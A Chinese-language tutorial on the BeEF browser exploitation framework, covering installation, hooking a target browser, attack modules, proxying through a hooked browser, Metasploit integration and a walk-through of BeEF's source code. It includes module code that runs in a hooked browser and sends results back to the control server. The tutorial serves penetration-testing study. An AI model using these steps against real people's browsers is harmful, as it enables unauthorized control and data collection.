BeEF

一、BeEF简介

　　BeEF是浏览器攻击框架的简称，是一款专注于浏览器端的渗透测试工具。可在其官网找到更详细的介绍http://beefproject.com/。

　　二、安装BeEF

　　先下载Beef最新版本

　　$ svn checkout http://beef.googlecode.com/svn/track/ beef

　　$ ruby install

　　选择第一项自动安装需要的相关gems即可，也可以选择2按照提示一个一个进行安装，安装完成后就可以直接启动了

　　$ ruby beef -x

　　三、使用说明

　　3.1 启动BeEF

　　安装完成后，启动BeEF

　　#./beef

　　命令行中显示的UI URL以后即为WEB接口，用浏览器打开，输入默认密码beef/beef，即可进入BeEF管理页面

　　按照提示，假设此时目标192.168.11.1的服务器访问了这个demo页面

　　http://192.168.11.152:3000/demos/basic.html。则就被hook上了，如下图所示

　　3.2 实施攻击

　　HOOK持续的时间为关闭测试页面为止。在此期间，相当于被控制了，可以发送攻击命令了。选择commands栏，可以看到很多已经分好类的攻击模块。

　　其中，4种颜色分别表示：

　　该攻击模块可用，且隐蔽性强

　　该攻击模块可用，但隐蔽性查

　　该用户模块是否可用还有待验证

　　该攻击模块不可用

　　例如，选取MISC下的Raw JavaScript模块作为测试用例，右端表格有该模块的详细说明，以及一些可选的参数等。输入Javascript code，点击Excute进行攻击，效果如下图所示

　　3.3 Proxy功能

　　选中目标主机，点右键，在菜单中选中Use as Proxy

　　然后再Rider选项卡中的Forge Request 编辑并发送想要发送的内容

　　通过查看目标浏览器firebug记录，可以确信确实发送了该http，达到了代理效果。同时Rider下的History选项也记录了发送历史记录

　　四、Metasploit组合

　　由于BeEF默认是不加载metasploit的，要使用Metasploit丰富的攻击模块，需要做些配置。BT5下，首先到beef目录下修改/pentest/web/beef/config.yaml文件,将其中的metasploit选项改为enable，如下所示：

　　然后查看/pentest/web/beef/extensions/metasploit/config.yaml。查看到其中的pass默认为abc123，这是与metasploit通信约定的密码。转到msf目录 /opt/metasploit/msf3/。新建一个 beef.rc文件，内容为

　　load msgrpc ServerHost=127.0.0.1 Pass=abc123

　　从而实现与beef的通信。启动msfconsole，

　　#msfconsole –r beef.rc，如下图所示，顺利启动服务。

　　现在可以启动beef了，启动后，可以看到BEEF加载了204个metasploit的攻击模块

　　页面如图，现在可以使用metasploit的模块进行攻击了。

　　五、实现原理

　　5.1 简述

　　BEEF 采用ruby语言编写，其目录结构如下所示:

　　除去一些安装和说明文件，Beef最主要的目录有三个，core、extension和modules。BEEF的核心文件在core目录下，各种扩展功能在extension目录下，modules则为攻击模块目录。

　　5.2 Core

　　Core目录是BEEF的核心目录，并负责加载extension和module。其中最关键的文件位于core\main目录下，其文件结构如下所示：

　　Client目录下均为js文件，是在受控客户端(hooked browser)使用的js文件，包括net、browser、encode、os等的实现，以update.js为例，在core\main\client\update.js中可以看到，定义了beef.updater，设置每隔5秒check一次是否有新的命令，如果有，则获取并执行之。

　　Console目录用于命令行控制

　　Constants目录定义了各种常量

　　Handlers目录主要用于处理来自受控客户端连接请求。

　　Models 定义了一些基本的类

　　Rest目录：即WEB服务基于REST原则，是一种轻量级的HTTP实现。 在server.rb中可看到，是通过mount的形式将资源与URL相对应，即它不是一个简单的WEB目录服务，任何需要http服务的资源，都需要先mount才能使用。

　　def mount(url, http_handler_class, args = nil)

　　# argument type checking

　　raise Exception::TypeError, ‘”url” needs to be a string’ if not url.string?

　　if args == nil

　　mounts[url] = http_handler_class

　　else

　　mounts[url] = http_handler_class, *args

　　end

　　print_debug(“Server: mounted handler ‘#{url}’”)

　　end

　　………

　　self.mount(“/init”, BeEF::Core::Handlers::BrowserDetails)

　　………

　　# Rack mount points

　　@rack_app = Rack::URLMap.new(@mounts)

　　………

　　# Create the BeEF http server

　　@http_server = Thin::Server.new(

　　@configuration.get(‘beef.http.host’),

　　@configuration.get(‘beef.http.port’),

　　@rack_app)

　　5.3 extensions

　　Extention目录下为各种扩展应用

　　其中几个extension的作用如下：

　　Admin_ui: 实现了一个WEB界面的控制后台。

　　Metasploit: 与metasploit互通相关的设置。

　　Requester: 负责处理HTTP请求，其文件如下所示：

　　其中：

　　Extension.rb 是每个扩展必有的文件，是加载该扩展的接口文件。

　　Config.yaml为作者和该扩展相关信息。

　　Api.rb为自身注册的一些API函数。

　　Models定义了一个http模型对象，例如，其中有个has_run属性，当请求未发送时，其值为”waiting”，发送攻击时，遍历状态为”waiting”的模块，并发送http请求。

　　Handler.rb 主要是处理http响应，收到响应后将相应的模块has_run状态置为complete，并保存到数据库。

　　5.4 modules

　　Modules集合了BEEF的各个攻击模块，一般一个攻击模块分为3个文件：command.js、config.yaml、module.rb。这样的结构可以很方便地进行模块添加，易于扩展。

　　Config.yaml: 攻击模块相关信息，如名称、描述、分类、作者、适用场景等

　　Module.rb:文件定义了该攻击模块的类，继承了BEFF::Core::Command类，在通用command类的基础上定义一些该模块特有的处理函数，如使用较多的一个函数是post_execute，即攻击进行后进行的操作(一般为保存结果)，如下所示。

　　class Browser_fingerprinting<beef::core::command< p="">

　　def post_execute

　　content = {}

　　content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil?

　　content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil?

　　if content.empty?

　　content['fail'] = ‘Failed to fingerprint browser.’

　　end

　　save content

　　end

　　end

　　Command.js: 即为攻击代码，攻击时读取此js并发送给受控客户端。以detect_firebug模块的command.js为例，代码如下所示：

　　beef.execute(function() {

　　var result = “Not in use or not installed”;

　　if (window.console &&(window.console.firebug || window.console.exception)) result = “Enabled and in use!”;

　　beef.net.send(“”, , “firebug=”+result);

　　});

　　代码很简单，在受控客户端执行取得结果之后，将结果返回给server端。Beef.net在core/main/client目录下定义。

　　在 Core目录下的Command.rb中，可以看到加载过程，首先判断该攻击模块的command.js是否存在，如存在，就读取到@eruby，可能还需要进行参数替换，所以需要进行evaluate操作。

　　def output

　　f = @path+’command.js’

　　(print_error “#{f} file does not exist”;return) if not File.exists? f

　　command = BeEF::Core::Models::Command.first(:id => @command_id)

　　@eruby = Erubis::FastEruby.new(File.read(f))

　　data = BeEF::Core::Configuration.instance.get(“beef.module.#{@key}”)

　　cc = BeEF::Core::CommandContext.new

　　cc['command_url'] = @default_command_url

　　cc['command_id'] = @command_id

　　JSON.parse(command['data']).each{|v|

　　cc[v['name']] = v['value']

　　}

　　if self.respond_to?(:execute)

　　self.execute

　　end

　　@output = @eruby.evaluate(cc)

　　@output

　　end